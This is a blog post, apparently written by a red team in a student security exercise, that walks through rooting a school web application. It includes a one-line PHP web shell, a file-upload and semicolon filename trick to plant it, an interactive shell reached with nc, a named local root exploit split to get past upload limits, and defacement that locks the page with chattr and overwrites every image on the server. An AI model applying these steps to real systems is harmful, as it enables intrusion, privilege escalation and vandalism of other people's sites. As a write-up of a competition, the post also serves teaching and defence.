secret

NTk2Zjc1MjA3MzY1NzI2OTZmNzU3MzZjNzkyMDY0NjU2MzZmNjQ2NTY0MjA3NDY4Njk3MzNmMjAy
MDU0Njk2ZDY1MjA3NzY1NmM2YzIwNzM3MDY1NmU3NDIwM2EyOQ==

Friday, April 19, 2013

Student exercise web application - How we got Root over http


Steps that occurred to gain root access a web application given as an inject is listed below. This method was used because the students were able to quickly fix the system exec commands located in the register page. The SQL injection was too tricky to try and write to the disk. Our phpMyadmin method could not be used since the schools slowly figured out that they did not need this installed. We needed to get really creative with it. All of us contributed to this solution which is a bit crazy but worked out for us.

  1. Obtained the actual VM and source code ( yes we needed an advantage as the schools has this app for an entire day, so did we =P )
  2. Discovered multiple vulnerabilities in within Register.php, Search.php, and Profile.php
  3. The logic for creating an account allowed us to write arbitrary files to disk.

      1. Create a username by the name of “Default” without quotes.
        • Create a php file with the following string <?php system($_GET["backup"])?>
        • Rename the php file with a .jpg extension to bypass the jpg file type restriction
        • Default.jpg that is located in /avatars/ is used for every new user who signs up. Its a placeholder photo.
        • The php file that is renamed to a .jpg file is uploaded it will overwrite the existing Default.jpg that resided on disk, because we created a username of Default.
        • Anytime you upload a file to the profile photo upload function, it is renamed to Profilename.jpg which allowed us to overwrite the default.jpg file.

      2. Create a username called “JimBob.php;” without quotes.
        • By adding a semicolon to the end of this username, the application copies the “Default.jpg” file with the php code we hid. The semicolon will rip off the .jpg extension. So you are now left with a file called JimBob.php.

  4. Access the php shell that we arbitrarily created by going to: http://app.school.net/avatars/JimBob.php?backup= YOUR COMMAND HERE
  5. Now that you have a command shell to execute commands we needed to create an interactive shell as if you were connected through SSH. Since the user www-data that apache was using did not have root privileges and were unable to easily escelate privileges to root.
  6. We created an interactive shell by using the profile photo upload function to upload files we needed to the server.
      1. We downloaded http://pentestmonkey.net/tools/web-shells/php-findsock-shell application and compiled the .c code on the same version of Ubuntu Linux
      2. We then uploaded two files, the php-findsock-shell.php file and findsock linux binary.
      3. In order to upload these files we still needed to rename each file with a .jpg extension.
      4. Each time we uploaded a file we used the JimBob.php file to rename the files we uploaded. These files needed to be uploaded by a normal username we created so it wouldn't over write our JimBob.php file.
      5. We renamed each file and moved them appropriately.
  7. Once the files were uploaded we could call our interactive Shell by using the following commands in our Bash terminal from any machine.
      1. $ nc -v app.schoolname.net 80
      2. GET /avatars/php-findsock-shell.php HTTP/1.0
      3. $ whoami
        • Output would be www-data and we now have interactive shell
  8. Escalate privileges to ROOT
      1. Since this application was running under an old version of Ubuntu, plenty of local root exploits were available. Once in which is very reliable called wunderbar_emporiumv3.
      2. We had to compile the root exploit on our VM that we created with the same version of Ubuntu. Gcc/G++ compiler was not installed on the schools vm's so we could compile anything on the host.
      3. After we compiled the exploit, the profile picture uploader was limited to 2mb files to upload. Our exploit was around 4-5mb.
        • We bypassed this by splitting the exploit binary file into 3 pieces and uploaded on piece at a time.
        • We then concatenated/appended each file together to put it back into one file through our interactive shell.
        • Chmod 777 on the file
        • ran the exploit with ./exploit
        • we now have ROOT!!! #
        • # whoami
        • # root


  1. Since we are nice guys, we decided to deface their website, without destroying their entire application. We placed an index.html file with our awesome animated GIF file thanks to other team members. Index.html takes priority over index.php.
    1. The command chattr +i ./index.html was used to make it a pain to remote the file unless they were aware of that command. We forgot to put this on RMC so RMC was able to remove theirs.
  2. We took a step further, and used the animated GIF file to overwrite every single jpg file that existed on the server with a simple BASH shell script to overwrite any file with the .jpg extension with our own.

No comments:

Post a Comment